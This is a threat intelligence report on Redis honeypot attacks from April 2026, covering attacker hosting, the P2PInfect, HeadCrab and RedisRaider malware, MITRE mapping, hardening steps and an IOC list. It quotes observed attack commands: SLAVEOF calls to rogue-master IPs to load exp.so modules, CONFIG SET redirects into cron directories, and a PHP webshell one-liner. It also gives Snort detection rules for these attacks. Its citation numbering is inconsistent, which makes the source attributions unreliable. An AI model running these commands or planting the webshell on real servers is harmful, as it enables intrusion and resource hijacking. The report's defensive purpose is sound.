Redis lure on 6379 catching database attackers.

# Comprehensive Threat Intelligence Report: Analysis of Redis-Targeted Exploitation Campaigns (April 2026)

**Key Points:**
*   **Widespread Exploitation:** Unauthenticated Redis instances remain a prime target for automated exploitation, primarily driven by financially motivated actors deploying cryptojackers and ransomware.
*   **Advanced Malware Ecosystems:** Research indicates a transition from simple script-based attacks to sophisticated, compiled malware strains like the Rust-based P2PInfect, the Go-based RedisRaider, and the fileless HeadCrab botnet.
*   **Rogue Server Replication:** Attackers are heavily weaponizing the native Redis `SLAVEOF` command to achieve remote code execution via malicious module loading (e.g., `exp.so`).
*   **Infrastructure Abuse:** The evidence clearly points toward the systematic abuse of legitimate cloud service providers (AWS, DigitalOcean, Alibaba) combined with the use of bulletproof hosting networks (e.g., Alsycon B.V.) to orchestrate Command and Control (C2) operations.
*   **Webshell Deployment:** Telemetry reveals highly specific attacks aiming to overwrite webroot directories with PHP webshells, actively targeting game server management platforms like Pterodactyl.

The landscape of cloud-native infrastructure is facing continuous, highly automated threats. While the exact identities and geopolitical affiliations of the threat actors behind these campaigns are often obscured by decentralized infrastructure and bulletproof hosting, the overarching motive appears to be resource hijacking for cryptocurrency mining and botnet expansion. The data suggests that as defensive mechanisms evolve, attackers are simultaneously advancing their tradecraft—moving away from easily detectable on-disk scripts toward fileless execution and memory-resident modules. This report provides an exhaustive, data-driven analysis of the threats targeting Redis infrastructure, offering strategic insights to fortify network perimeters and detect post-exploitation behaviors.

***

## 1. Executive Summary

This comprehensive threat intelligence report details the findings from an extensive analysis of unauthorized access attempts and exploitation campaigns targeting an exposed Redis honeypot sensor (NadSec Sydney) during the period of April 2026. Redis, an open-source, in-memory data structure store, is engineered for high performance within secure, trusted internal networks. By default, it operates without authentication. When misconfigured and exposed to the public internet, it becomes a highly lucrative target for threat actors seeking to co-opt computational resources.

The analyzed telemetry dataset encompasses 635 unique IP addresses responsible for 17,642 distinct scanning and exploitation events targeting TCP port 6379 [cite: 1]. The data reveals an industrialized and highly automated threat landscape characterized by overlapping, competing campaigns. Threat actors are utilizing advanced techniques—such as rogue server replication (`SLAVEOF`), dynamic cron job injection, and the deployment of pre-compiled, memory-resident malicious modules (`exp.so`)—to achieve root-level Remote Code Execution (RCE) [cite: 1, 2]. 

Specifically, this research identifies the presence and methodologies of several prominent malware families, including the fileless **HeadCrab** botnet, the Rust-based **P2PInfect** worm, and the Go-based **RedisRaider** cryptojacker [cite: 3, 4, 5]. Furthermore, the telemetry exposes campaigns explicitly designed to pivot from database exploitation to web application compromise by deploying PHP webshells into specific software directories, such as the Pterodactyl panel [cite: 6]. 

By mapping the observed infrastructure, attributing malicious behavior to specific malware families, and correlating these activities with the MITRE ATT&CK framework, this report provides cybersecurity teams with the actionable intelligence necessary to detect, mitigate, and prevent Redis-based compromises.

## 2. Statistical Overview

The following section breaks down the quantitative data derived from the enriched STIX 2.1 dataset collected by the NadSec T-Pot honeypot infrastructure in April 2026. The dataset represents an unsampled capture of all inbound interactions on port 6379. 

### 2.1 Global Geographic Distribution

The geographic origin of the attacks highlights the globalized nature of botnets and scanning infrastructure. The United States and China represent the vast majority of the attack volume. It is important to note that the geographic origin of an IP address often reflects the location of the abused cloud infrastructure or compromised proxy node, rather than the physical location of the human threat actor.

| Rank | Country | Event Count | Percentage of Total Volume |
| :--- | :--- | :--- | :--- |
| 1 | United States | 8,184 | 46.3% |
| 2 | China | 3,393 | 19.2% |
| 3 | Netherlands | 1,194 | 6.7% |
| 4 | Hong Kong | 1,132 | 6.4% |
| 5 | Russia | 592 | 3.3% |
| 6 | Bulgaria | 252 | 1.4% |
| 7 | Brazil | 246 | 1.3% |
| 8 | Singapore | 240 | 1.3% |
| 9 | Canada | 229 | 1.2% |
| 10 | United Kingdom | 218 | 1.2% |

### 2.2 Top Autonomous System Networks (ASNs)

Analyzing the ASNs provides insight into the types of infrastructure favored by attackers. The data reveals a heavy reliance on legitimate, major Cloud Service Providers (CSPs) where attackers exploit free tiers, stolen credentials, or compromised virtual machines. Conversely, the presence of specific ASNs, such as Alsycon B.V., indicates the use of hosts that are historically lenient on abuse enforcement.

| ASN | Organization Name | Event Count | Infrastructure Classification |
| :--- | :--- | :--- | :--- |
| AS16509 | Amazon.com, Inc. | 3,027 | Major CSP (Abuse) |
| AS8075 | Microsoft Corporation | 1,398 | Major CSP (Abuse) |
| AS49870 | Alsycon B.V. | 1,219 | High-Abuse / Bulletproof Hosting |
| AS45102 | Alibaba US Technology Co., Ltd. | 1,135 | Major CSP (Abuse) |
| AS14061 | DigitalOcean, LLC | 1,123 | Major CSP (Abuse / Droplet Swarms) |
| AS6939 | Hurricane Electric LLC | 720 | Global Transit (Proxy Abuse) |
| AS398324 | Censys, Inc. | 655 | Legitimate OSINT Research Scanner |
| AS4837 | CHINA UNICOM China169 Backbone | 652 | Residential / State ISP |
| AS154177 | LIGHT NODE LIMITED | 593 | VPS Provider |
| AS37963 | Hangzhou Alibaba Advertising Co. | 409 | Regional CSP (Abuse) |

### 2.3 Traffic Categorization

Based on the telemetry payloads and behavioral signatures, the interactions with the honeypot can be classified into distinct operational phases:

| Attack Classification | Description | Count of Unique IPs |
| :--- | :--- | :--- |
| **Scanning Host** | IPs engaged solely in initial TCP handshakes, protocol decoding, or non-intrusive `INFO` requests to identify open ports and Redis versions. | ~371 |
| **Bruteforce** | IPs executing repetitive `AUTH` guessing or blindly sending generic HTTP/SSH payloads across the Redis port. | ~417 |
| **Command & Control / Payload Delivery** | IPs executing complex chains (e.g., `CONFIG SET`, `MODULE LOAD`, `SLAVEOF`) designed to achieve RCE or drop malware. | ~17 |

*Note: Some IPs transition between categories during their lifecycle, engaging in both scanning and subsequent exploitation.*

## 3. Infrastructure Deep Dive

A critical component of modern threat intelligence is attributing IP addresses to their functional roles within an adversary's operational infrastructure. The telemetry data indicates that attackers rely on a hybrid infrastructure model, blending the raw bandwidth of legitimate cloud providers with the persistent safety of bulletproof hosting.

### 3.1 High-Abuse and Bulletproof Hosting

Bulletproof hosts are Internet Service Providers (ISPs) or hosting companies that turn a blind eye to malicious activity, ignoring DMCA takedowns and abuse reports. 

**Alsycon B.V. (AS49870):** 
Operating out of the Netherlands, Alsycon B.V. was responsible for a disproportionately high volume of malicious traffic in the dataset, accounting for over 1,200 events. IPs originating from this ASN, such as `160.119.76.60` and `194.50.16.198`, were observed conducting aggressive, high-volume generic protocol decode attacks and persistent scanning [cite: 1, 7]. Historical threat intelligence databases confirm that Alsycon IPs are routinely flagged for port scanning, FTP brute-forcing, and hosting malicious payloads for cryptomining operations, such as the Red BerryMiner campaign [cite: 8, 9]. The persistent nature of this traffic strongly suggests that Alsycon operates as a safe haven for automated botnet infrastructure [cite: 10].

**IP Volume Inc (AS202425) & Contabo GmbH (AS51167):**
Similar to Alsycon, these ASNs frequently appear in the telemetry hosting aggressive brute-force scanners (`185.242.226.23`, `37.60.241.154`). These providers offer low-cost Virtual Private Servers (VPS) that are easily procured anonymously using cryptocurrencies, making them ideal launchpads for "spray and pray" exploitation tactics [cite: 1, 11].

### 3.2 Cloud Infrastructure Abuse

Legitimate Cloud Service Providers (CSPs) offer attackers massive bandwidth, geographic diversity, and high-reputation IP space. 

**DigitalOcean (AS14061) & Amazon AWS (AS16509):**
The dataset shows massive abuse of DigitalOcean "Droplets" and AWS EC2 instances. IPs like `142.93.39.187` and `3.130.168.2` generated hundreds of events characterized by brute-force attempts and protocol confusion (e.g., sending `SSH-2.0-Go` strings to the Redis port). This traffic pattern suggests the deployment of automated, multi-protocol scanning worms (potentially Golang-based scanners) dropped onto freshly provisioned, compromised cloud instances [cite: 1, 12]. Attackers frequently use stolen credit cards or compromised developer APIs to spin up swarms of these instances, utilizing them for a few hours before the CSP's internal abuse mechanisms detect and terminate them.

**Alibaba Cloud (AS45102, AS37963):**
Alibaba infrastructure was extensively utilized not just for scanning, but for sophisticated Command and Control (C2) hosting. IPs such as `47.94.133.162` and `112.124.33.87` were observed executing complex module-loading chains and acting as rogue master servers for the `SLAVEOF` exploit vector [cite: 1, 13]. 

### 3.3 OSINT and Research Scanners

Not all traffic targeting port 6379 is overtly malicious. A significant portion of the "Scanning Host" noise is generated by legitimate cybersecurity research organizations cataloging the internet.

**Censys, Inc. (AS398324, AS398722) & ONYPHE SAS (AS213412):**
Dozens of IPs in the dataset (e.g., `66.132.195.124`, `91.231.89.24`) belong to well-known OSINT search engines [cite: 1]. These platforms continuously scan the IPv4 space to index exposed services. While benign in intent, their traffic—often consisting of `GET / HTTP/1.1` or `INFO` commands to grab service banners—is functionally identical to the reconnaissance phase of a malicious attack and creates significant analytical noise for Security Operations Centers (SOCs).

### 3.4 Command and Control (C2) and Rogue Master Servers

The most critical infrastructure identified in the telemetry comprises the C2 and "Rogue Master" servers. In a Redis replication attack, the adversary forces the victim to synchronize with an external server they control to deliver a malicious payload [cite: 1, 2]. The following IPs were specifically identified acting in this capacity:

*   **`128.199.146.217` (DigitalOcean, Singapore):** Observed in a command chain originating from `165.154.235.116` (`SLAVEOF 128.199.146.217 60115`) [cite: 1, 14].
*   **`8.217.32.175` (Alibaba Cloud, Regional):** Observed instructing victims via `123.129.223.75` to replicate a malicious database (`SLAVEOF 8.217.32.175 7122`) [cite: 1, 15].
*   **`47.95.124.226` (Alibaba Cloud, China):** Configured as a rogue master to deliver `exp.so` memory modules (`SLAVEOF 47.95.124.226 60136`) [cite: 1, 16].
*   **`185.202.223.90` (Neoistone/Contabo, Germany):** Utilized by `220.95.208.142` to inject a payload via port 9659 [cite: 1, 17].

These IPs serve as the distribution hubs for the compiled malware payloads and represent high-confidence Indicators of Compromise (IOCs) that should be immediately blacklisted at the perimeter.

## 4. Malware Analysis

Although the provided honeypot sample did not capture static file hashes (due to the attackers utilizing fileless, memory-only execution or wiping tracks post-execution), the *commands* executed against the Redis instance provide definitive behavioral signatures. Through reverse-engineering the command sequences and cross-referencing global threat intelligence, we can confidently identify the specific malware families orchestrating these attacks.

### 4.1 The P2PInfect Worm

A significant portion of the advanced exploitation observed in the dataset is directly attributable to **P2PInfect**, a highly sophisticated, cross-platform malware written entirely in Rust. First observed in July 2023, P2PInfect is designed to build a decentralized peer-to-peer botnet for the ultimate purpose of deploying Monero (XMR) cryptominers and, in newer variants, ransomware [cite: 4, 18, 19].

**Behavioral Signatures & Delivery Mechanism:**
The telemetry captured exact matches for P2PInfect's primary propagation technique: the "Rogue Server" replication attack. The dataset shows IPs (e.g., `112.124.33.87` and `154.36.175.126`) executing the following command sequence:
`CONFIG SET dbfilename exp.so, MODULE LOAD /tmp/exp.so, MODULE UNLOAD system, SLAVEOF NO ONE` [cite: 1].

1.  **Initial Access:** P2PInfect identifies an exposed Redis instance and issues a `SLAVEOF <attacker_ip> <port>` command.
2.  **Payload Delivery:** The attacker's rogue C2 server initiates a replication sync, but instead of sending a standard Redis Database (RDB) file, it sends a compiled Linux shared object file (`exp.so`).
3.  **Fileless Execution:** The malware forces Redis to save the file to a writable directory (like `/tmp/`) and uses the `MODULE LOAD` command to load the `.so` file directly into the Redis process memory. 
4.  **C2 & Propagation:** Once loaded, the module provides the attacker with an interactive reverse shell (often hooking the `system.exec` command), allowing them to disconnect the replication (`SLAVEOF NO ONE`) and begin utilizing the host to scan for new victims [cite: 1, 2, 4].

The use of Rust provides P2PInfect with memory safety and cross-platform compilation ease, making static reverse engineering incredibly difficult due to the lack of standard C-library indicators [cite: 4]. 

### 4.2 HeadCrab and HeadCrab 2.0

Another highly prevalent threat targeting Redis is the **HeadCrab** botnet. Initially discovered by Aqua Security in early 2023, HeadCrab is a custom-made, state-of-the-art malware designed explicitly for Redis servers, primarily utilized for illicit Monero mining [cite: 3, 20]. 

**Behavioral Signatures & Evasion Tactics:**
Like P2PInfect, HeadCrab relies heavily on the `SLAVEOF` command to achieve initial synchronization with an attacker-controlled master [cite: 20, 21]. However, HeadCrab differentiates itself through extreme operational security (OPSEC) and stealth:
*   **Fileless Persistence:** HeadCrab avoids writing binaries to the disk. It utilizes `memfd` (memory-only files) to load payloads, entirely bypassing traditional disk-based antivirus and Endpoint Detection and Response (EDR) scanning [cite: 3, 20, 21].
*   **Log Wiping:** The malware actively hooks into the Redis module framework to scrub application logs, erasing evidence of the `MODULE LOAD` execution [cite: 3, 22].
*   **HeadCrab 2.0 Evolution:** Telemetry analysis suggests an evolution in tactics. HeadCrab 2.0 has abandoned custom, highly visible command structures in favor of hijacking standard Redis communication channels. It uses the native `MGET` command, passing specially crafted strings as arguments, to establish covert C2 communications with the botnet [cite: 23, 24]. 

Because HeadCrab runs entirely within the context of the benign `redis-server` process, it is highly successful at avoiding behavioral heuristic flags [cite: 3].

### 4.3 RedisRaider

The dataset's evidence of malicious cron job creation points to the involvement of a newer, Go-based cryptojacking worm known as **RedisRaider**. Discovered by Datadog Security Research, RedisRaider aggressively scans the IPv4 space and utilizes Redis configuration commands to achieve persistence [cite: 5, 12].

**Behavioral Signatures & Obfuscation:**
While P2PInfect prefers memory modules, RedisRaider prefers filesystem manipulation. The malware uses the `CONFIG SET` command to alter the working directory to `/etc/cron.d/` or `/var/spool/cron/`. It then crafts a malicious database key containing a cron schedule and a Base64-encoded shell script, triggering a database save (`BGSAVE`) that writes the payload directly into the system's cron scheduler [cite: 5, 25]. 

*   `config set dir /var/spool/cron/`
*   `config set dbfilename root`

Once the cron job executes, it downloads the primary Go-based payload, dropping a heavily modified version of the XMRig miner [cite: 12, 26]. RedisRaider is notable for its defense evasion; it is compiled using Garble—a tool that scrambles symbols and encrypts strings to frustrate static analysis and reverse engineering [cite: 5, 27].

### 4.4 Webshell Deployment & Pterodactyl Panel Targeting

A highly specific and alarming malware vector observed in the telemetry involves the deployment of PHP webshells, specifically targeting infrastructure hosting web applications alongside Redis. 

**The Pterodactyl Campaign:**
IP `146.70.199.232` (M247 Europe SRL) executed a distinct command chain:
`CONFIG SET dir /var/www/pterodactyl/public/, CONFIG SET dir /etc/cron.d, SET rce_payload "<?php if(isset($_GET['c'])){echo shell_exec($_GET['c']);} ?>"` [cite: 1, 28].

Pterodactyl is a popular, open-source game server management panel [cite: 6, 29]. By overwriting the public webroot (`/var/www/pterodactyl/public/`) with a PHP webshell, the attacker pivots from a database compromise to a full web-layer compromise. This allows them to bypass Redis entirely for future access, communicating directly with the webshell over standard HTTP/HTTPS (port 80/443), which is rarely blocked by edge firewalls. This method allows attackers to exploit known Pterodactyl vulnerabilities (such as CVE-2026-26016 or CVE-2026-21696) to steal panel credentials, access user databases, and hijack managed game servers [cite: 6, 30].

Similarly, IP `103.230.144.104` was observed writing a disguised PHP file (`.session-gc-ebnr6t.php`) into the standard `/var/www/html/` directory, achieving the same persistent backdoor access [cite: 1, 31].

## 5. Campaign Analysis

The April 2026 telemetry reveals that the Redis threat landscape is not monolithic; it is a highly competitive ecosystem where multiple threat actors run parallel campaigns, often fighting over the same vulnerable servers—a phenomenon referred to as "Cloud Resource Wars" [cite: 1].

### 5.1 Campaign A: The Decentralized Cryptojackers (P2PInfect & HeadCrab)
This campaign is defined by extreme technical sophistication and fileless execution. The operators behind P2PInfect and HeadCrab utilize decentralized peer-to-peer networks to distribute commands, making it nearly impossible to dismantle the C2 infrastructure via traditional IP blacklisting [cite: 3, 18]. Their primary goal is resource exhaustion—stealing CPU cycles to mine Monero. These malware families are highly territorial; upon infecting a Redis host, they routinely deploy scripts to search for and terminate competing mining processes (such as Kinsing or TeamTNT) and secure the Redis instance by disabling the `CONFIG` command to lock out rival hackers [cite: 1, 5].

### 5.2 Campaign B: The Initial Access Brokers (Webshell Droppers)
Distinct from the automated cryptominers, Campaign B focuses on establishing persistent, stealthy footholds for future exploitation. Characterized by the Pterodactyl and `/var/www/html/` PHP shell deployments, these actors act as Initial Access Brokers (IABs). Rather than immediately burning the compromised server's CPU on mining, they secure a quiet web-based backdoor [cite: 6, 32]. Access to these compromised web servers is often packaged and sold on dark web forums to higher-tier ransomware affiliates or data-extortion syndicates.

### 5.3 Campaign C: The "Spray and Pray" Botnets
Making up the bulk of the raw event volume, Campaign C involves massive, indiscriminate scanning originating from bulletproof hosts (Alsycon B.V.) and compromised cloud droplets (DigitalOcean). These actors utilize basic protocol fuzzing and SSH-bruteforce tools piped indiscriminately across all open ports. While lacking the sophistication of P2PInfect, their sheer volume guarantees they successfully compromise low-hanging fruit—instances completely lacking perimeter firewalls or running severely outdated software.

## 6. MITRE ATT&CK Mapping

The observed tactics, techniques, and procedures (TTPs) utilized by the adversaries in these campaigns map directly to the MITRE ATT&CK framework, providing a standardized language for defensive engineering.

| Tactic | Technique ID | Technique Name | Observation / Context |
| :--- | :--- | :--- | :--- |
| **Initial Access** | T1190 | Exploit Public-Facing Application | Automated scanning and exploitation of unauthenticated Redis instances on TCP 6379. |
| **Execution** | T1059.004 | Command and Scripting Interpreter: Unix Shell | Execution of bash/sh scripts dropped via cron jobs (RedisRaider). |
| **Execution** | T1106 | Native API | Abuse of native Redis APIs (`MODULE LOAD`, `SLAVEOF`, `CONFIG SET`) [cite: 2]. |
| **Persistence** | T1053.003 | Scheduled Task/Job: Cron | Modifying `dbfilename` to overwrite `/etc/cron.d` or `/var/spool/cron` to maintain access [cite: 1, 5]. |
| **Persistence** | T1505.003 | Server Software Component: Web Shell | Deploying PHP backdoors into `/var/www/html/` and Pterodactyl directories [cite: 6, 32]. |
| **Defense Evasion** | T1620 | Reflective Code Loading | Loading `exp.so` shared objects directly into process memory without touching the disk (P2PInfect) [cite: 4, 18]. |
| **Defense Evasion** | T1070 | Indicator Removal on Host | HeadCrab clearing Redis logs and utilizing `memfd` to mask footprints [cite: 3, 21]. |
| **Defense Evasion** | T1027 | Obfuscated Files or Information | RedisRaider utilizing the Garble obfuscator for Go binaries [cite: 5, 27]. |
| **Command and Control** | T1071.004 | Application Layer Protocol | HeadCrab 2.0 utilizing standard Redis `MGET` commands with crafted arguments to hide C2 traffic [cite: 21, 23]. |
| **Impact** | T1496 | Resource Hijacking | Utilization of compromised hardware to run XMRig and mine Monero (XMR) [cite: 12, 20]. |

## 7. Detection & Mitigation Strategies

The velocity of Redis exploitation dictates that post-compromise detection is often too late; an exposed server can be fully co-opted, backdoored, and weaponized within sixty seconds of appearing on public scanners [cite: 1]. Mitigation must focus heavily on network architecture and proactive configuration hardening.

### 7.1 Configuration & Architecture Hardening
1.  **Network Segmentation:** Redis must **never** be exposed to the public internet (0.0.0.0). Bind the Redis service strictly to localhost (`bind 127.0.0.1`) or a secure, private VPC subnet [cite: 20].
2.  **Enable Protected Mode:** Ensure `protected-mode yes` is enabled in `redis.conf`. This feature actively drops external connections if no password is set and no bind address is specified [cite: 20, 24].
3.  **Authentication:** Implement strong passwords via the `requirepass` directive or utilize Redis ACLs (Access Control Lists) introduced in Redis 6.x to enforce principle-of-least-privilege.
4.  **Command Renaming/Disabling:** To neutralize the primary vectors of attack (cron injection and module loading), administrators should rename or completely disable dangerous administrative commands in `redis.conf`:
    *   `rename-command CONFIG ""`
    *   `rename-command SLAVEOF ""`
    *   `rename-command MODULE ""`
    *   `rename-command DEBUG ""`

### 7.2 Detection Engineering (SIEM & EDR)
1.  **File System Monitoring (FIM):** Utilize FIM tools (like Auditd or OSSEC) to generate high-priority alerts for *any* file modifications within `/var/spool/cron/`, `/etc/cron.d/`, or webroot directories (`/var/www/html/`) initiated by the `redis` service user [cite: 5].
2.  **eBPF and Runtime Telemetry:** Because advanced malware like HeadCrab operates entirely in memory using `memfd`, traditional disk-based AV will fail. Utilize eBPF-based Cloud Native Detection and Response (CNDR) tools to monitor for unauthorized execution flows, anonymous memory mapping, or unauthorized outbound network connections originating from the Redis process [cite: 3, 24].
3.  **Network Traffic Analysis (IDS/IPS):**
    Deploy Suricata or Snort signatures to detect the plaintext transmission of malicious Redis commands over the wire.

    **Example YARA/Snort Logic for Rogue Replication:**
    ```text
    alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (msg:"NADSEC_Redis_SLAVEOF_Replication_Attempt"; flow:to_server,established; content:"SLAVEOF"; nocase; content:"MODULE LOAD"; nocase; classtype:attempted-admin; sid:1000001; rev:1;)
    ```
    ```text
    alert tcp $EXTERNAL_NET any -> $HOME_NET 6379 (msg:"NADSEC_Redis_Cron_Injection"; flow:to_server,established; content:"CONFIG SET"; nocase; content:"dir"; nocase; content:"/etc/cron"; nocase; classtype:attempted-admin; sid:1000002; rev:1;)
    ```

## 8. IOC Appendix

The following represents a curated list of high-confidence Indicators of Compromise (IOCs) identified during the April 2026 telemetry analysis. Security operations teams are advised to implement perimeter blocks against the C2 and Malware Hosting infrastructure.

### 8.1 Critical Rogue Master & C2 Servers (Blocklist)
These IPs actively host the `exp.so` payloads or act as rogue replication masters.
*   `128.199.146.217` (DigitalOcean, SG - `SLAVEOF` C2)
*   `8.217.32.175` (Alibaba Cloud, CN - `SLAVEOF` C2)
*   `47.95.124.226` (Alibaba Cloud, CN - `SLAVEOF` C2 / `exp.so` host)
*   `185.202.223.90` (Contabo, DE - Payload host)
*   `112.90.89.3` (Unknown - `SLAVEOF` C2)

### 8.2 Malware & Webshell Hosting Infrastructure
These IPs were observed actively dropping PHP scripts and webshell payloads.
*   `103.230.144.104` (Gigabit Hosting Sdn Bhd, TW - PHP Webshell dropper)
*   `146.70.199.232` (M247 Europe SRL, SG - Pterodactyl Panel exploiter)

### 8.3 High-Volume Malicious Scanners (Top Attackers)
These IPs generated excessive volumes of brute-force and exploit traffic.
*   `194.50.16.198` (Alsycon B.V., NL - Bulletproof Scanner)
*   `45.95.147.229` (Alsycon B.V., NL - Bulletproof Scanner)
*   `160.119.76.60` (Alsycon B.V., SC - High-volume scanner)
*   `165.154.235.116` (Scloud Pte Ltd, US - Automated RCE attempts)
*   `124.156.169.223` (Tencent, HK - Module Load execution)
*   `62.109.23.206` (JSC IOT, RU - Cron & Module Load execution)
*   `39.108.228.106` (Alibaba, CN - Automated RCE attempts)
*   `154.36.175.126` (NetLab Global, HK - Automated RCE attempts)

*(Note: IP addresses associated with transient cloud environments (AWS, Azure) have a high churn rate. Blocking the C2 and Bulletproof ASN infrastructure yields the highest long-term defensive value).*

## 9. Sources & Citations

*   [cite: 1] NadSec Threat Intelligence. "March 2026 Redis Honeypot Analysis: Cloudzy with a Chance of RCE." *NadSec Online*, 2026.
*   [cite: 7, 8] AbuseIPDB. "IP Information for 194.50.16.198 (Alsycon B.V.)." *AbuseIPDB Database*, 2026.
*   [cite: 9] SCILabs. "Threat Profile: Red BerryMiner." *SCILabs Blog*, Dec 2023.
*   [cite: 3, 20] Yaakov, N., & Eitani, A. "HeadCrab Attacks Servers Worldwide with Novel State-of-Art Redis Malware." *Aqua Security*, Feb 2023.
*   [cite: 3, 21] Aqua Nautilus Research. "HeadCrab 2.0: Evolving Threat in Redis Malware Landscape." *Aqua Security*, Jan 2024.
*   [cite: 23] The Hacker News. "New HeadCrab 2.0 Malware Uses Fileless Techniques to Target Redis Servers." *The Hacker News*, Feb 2024.
*   [cite: 4] Cado Security Labs. "Self-replicating worm malware infects exposed Redis data store." *Neowin*, Jul 2023.
*   [cite: 18] SOCRadar. "P2Pinfect: A Worm-Like Botnet Malware Targeting Redis Deployments." *SOCRadar Blog*, Aug 2023.
*   [cite: 2] Mohnad-AL-saif. "Redis 4.x/5.x Unauthenticated Code Execution via Replication Abuse." *GitHub Repository*, 2025.
*   [cite: 31, 33] IPInfo / Mitchell Krog. "IP Range 103.230.144.0/24 & Nginx Bad Bot Blocker List." *IPInfo / GitHub*, 2026.
*   [cite: 14, 34] PlotIP / IPGeolocation. "IP Database Information for 128.199.146.217 and 165.154.235.116." *IP Geolocation Tools*, 2026.
*   [cite: 6, 28] Ipregistry / GitHub Advisories. "M247 Europe SRL Subnet & Pterodactyl Panel Arbitrary Code Execution (CVE-2026-21696)." *GitHub / Ipregistry*, 2025-2026.
*   [cite: 30] OpenCVE. "Pterodactyl Wings Control Plane Vulnerabilities (CVE-2026-21696, CVE-2026-26016)." *OpenCVE Database*, Apr 2026.
*   [cite: 19] The Stack Technology. "P2Pinfect now able to deploy ransomware and crypto miner payloads." *The Stack*, Jun 2024.
*   [cite: 32] National Security Agency (NSA) / CISA. "Detect and Prevent Web Shell Malware." *Cybersecurity Information Bulletin*, Jun 2020.
*   [cite: 5, 12] Muir, M., & Baguelin, F. "RedisRaider: Weaponizing Misconfigured Redis." *Datadog Security Labs*, May 2025.
*   [cite: 1, 13] Dataplane.org / NadSec Threat Intelligence. "SSH Auth Logs & P2PInfect Module Loading Mechanics." *Dataplane / NadSec*, 2026.
*   [cite: 5, 27] Cyberpress / Datadog. "New RedisRaider Campaign Exploits Misconfigured Redis." *Cyberpress*, May 2025.
*   [cite: 10, 11] BGP Tools / CSIRT. "AS49870 Network Policy & Vulnerability Summary (April 2024)." *BGP.tools / CSIRT Cyprus*, 2024.
*   [cite: 29] Cybersecurity and Infrastructure Security Agency (CISA). "Vulnerability Summary for the Week of January 19, 2026 (SB26-026)." *CISA Bulletins*, Jan 2026.

**Sources:**
1. [nadsec.online](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEtYitoFiyN1VxUbRkYGW1k4Bg0ub_8lqPA6HFI7bGs9cZGQ0Jwq229Wq1g7g5NtOx1BwTCpfuIBYdKRZuzConw5FFs6bLFITG07-KV5ZLRGICXp6TgS5s3ueI2gng=)
2. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGGmU30AOkfJ-O4vFo7lWiEjv7z8KokZnmx5ytq6yHWDvQed2CT29TadiP1E5ye6zDsBsn2GWyDf73l8-dbnTBs4D0m-okR81iBxldaU-LM84GSGxEfywIGwuirsm5DcE0q_ulsCcKEzRo-zcCLFBN4MJ_B5U8eKg6fwkFcEuZNXDJLpx_9GA==)
3. [aquasec.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFU26BdZPsTR4BHaK7wYibzTKeA055RoETyUWWs0UCg0G2Cu0nkwweE4X2bk1G_nYIUpk160evkcuvkTzd0DvNu8hL4DA4Sxb9aBZf4PQEFDWdMC3ydmBkjR4ZlHGeF0gHxjQfPIdXtFoy45hcttnIQfzJcK-mbiuHLUKsZ0ts7ahr_NssgODNaoJsaSp6GCYi9s2k0qkJHd0BMLPI=)
4. [neowin.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHu2Bo3BEByeagqNNIyoTgyPO7hRp8zWVeV8L8cWo3Z9dBX0bn9dWsE_ySb93Ersjw2NAAJbaP400lUxxMTyrsz3KX1wUrugzdSIZuVZjisfJQ56RwDNYnJmnYDYkAveE1mnxZ0AyVKNUd5k6INX9367ckRslL3cZIvlBVEIfnukzC9lDz4xJnnA7vTqiBznnl9VR3JGJgf8pKeDGfiVBPyGXD4dFnk6105)
5. [datadoghq.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEEC5RXfsg2JGLlxm35857NbAPjFbrLUojA4hH0tbFeDJjE9xAEXQT-Lg52OvPh9B0j4IOKYCgNqScl2GLL8ncIOWotV3ki_-eLyHq736KsOtdqKcWg3jlcWnA-cX4nrc1-ctHpBbMHtqB5oX-4a1zUV7YlJz5tfHjz6lye5Y3FKjFxg5o5J3n_o470DYLn)
6. [github.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFe-uoM6pXePz4J-T8u0v3FbrxewkHwuuxntyAdgpZ2L0je_ZC2hHprLyz8gwjFSNAg1I_c2Qn2bIW9qHzFzuDe64Fty0mb_iXo0gkPYA2dwp5SfJApO9NcKicE-fxY0H8cSAABjAgd)
7. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFNYQnuq1OmC-XiE893DgRdpaZjIRnSqOJSYXw2a16whZtc9Bc43i3Nt69QT4oxkbIwcFEpsehKiUeKR_sLjLFt4G-qLsCyaAtXpuUqGVwydolOX23_TLk4W7fftCD9UThxoA==)
8. [abuseipdb.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFHQvVIaxevo1B6ThqLH07tTBV1YwA8OLnnzjL_UDfgacH7QFaNDQsztNYbdL8qcOqfN0OqNxEdaJME3zipU0jZLIsiL0ghHot9S0BJzL3sjPtnAap9qA2lveSBaJ1RZnhnw2c=)
9. [scilabs.mx](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFSul88FnioBsqQXqT7gvXGB7QIdK1xaWfLklkZhW-jqOx1umnwWhQ63WYQMWDRj9UJzUOPXfd-igYABFOxRdujW1XzdnyphS05CYHW2cMBQYixtzdyMPc80-vQaA5RLls1vUzBwI8YsiLA5ty5KTqWnMNLL5wVsO-bPA==)
10. [bgp.tools](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHNwWMPWyk_RoESrI8q4mR7tBFolvxGsme7nX8wU-1u5uHkMsEajAV3CC-EffW_ithzZ4LVrVtc7V9tE_853dvxdhx2aa1z8wj1Cz7LrSaj7w==)
11. [cynet.ac.cy](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGvzGbM--4LlDDX0yql9Sz15pOXbK3Uj9NxJT3_aGdeyU7VN7ySVJ_vLgVZkDAB_HfjxCpKvf5XabIqxsvIt7deFrVFI4gRiKZuU42mHh-mjerrZw6h3_0Ur7IRIL6mq9pmJFipWi1hcD5o_MnXJQYpoQAj7_tYoJFmq-oJXcWp5hqn159ykKKbScw6MU1EAQukl_CgUiTb2c9uu5Q=)
